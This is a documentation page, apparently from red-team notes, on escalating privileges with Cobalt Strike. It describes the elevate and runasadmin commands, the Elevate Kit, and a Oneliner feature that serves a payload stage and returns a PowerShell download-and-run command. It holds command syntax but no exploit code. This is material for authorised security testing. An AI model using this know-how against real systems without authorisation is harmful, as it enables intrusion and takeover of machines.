search
githubEdit

Elevate with an Exploit

hashtag
1) elevate

  • This command lists privilege escalation exploits registered with Cobalt Strike.

hashtag
2) elevate [EXPLOIT] [LISTENER]

  • This command attempts to elevate with a specific exploit.

hashtag
You may also launch one of these exploits through [beacon] -> Access -> Elevate.

hashtag
Choose a listener, select an exploit, and press Launch to run the exploit. This dialog is a front-end for Beacon's elevate command.

hashtag
You may add privilege escalation exploits to Cobalt Strike through the Elevate Kit. The Elevate Kit is an Aggressor Script that integrates several open source privilege escalation exploits into Cobalt Strike. https://github.com/rsmudge/ElevateKit.

hashtag
3) runasadmin

  • This command by itself, lists command elevator exploits registered with Cobalt Strike.

hashtag
4) runasadmin [EXPLOIT] [COMMAND + ARGS]

  • This command attempts to run the specified command in an elevated context.

hashtag
Cobalt Strike separates command elevator exploits and session-yielding exploits because some attacks are a natural opportunity to spawn a session. Other attacks yield a “run this command” primitive. Spawning a session from a “run this command”primitive puts a lot of weaponization decisions (not always favorable) in the hands of your tool developer. With runasadmin, it’s your choice to drop an executable to disk and run it, to run a PowerShell one-liner, or to weaken the target in some way.

hashtag
If you’d like to use a PowerShell one-liner to spawn a session, go to [beacon] -> Access -> Oneliner.

hashtag
This dialog will setup a localhost-only webserver within your Beacon session to host a payload stage and return a PowerShell command to download and run this payload stage.

hashtag
This webserver is one-use only.Once it’s connected to once, it will clean itself up and stop serving your payload.

hashtag
If you run a TCP or SMB Beacon with this tool, you will need to use connect or link to assume control of the payload manually. Also, be aware that if you try to use an x64 payload—this will fail if the x86 PowerShell is in your $PATH.

hashtag
Cobalt Strike does not have many built-in elevate options. It is easy to integrate privilege escalation exploits via Cobalt Strike’s Aggressor Script programming language though. To see what this looks like, download the Elevate Kit (https://github.com/cobalt-strike/ElevateKit). The Elevate Kit is an Aggressor Script that integrates several open source privilege escalation exploits into Cobalt Strike.

PreviousCredential and Hash HarvestingNextGet SYSTEM

Last updated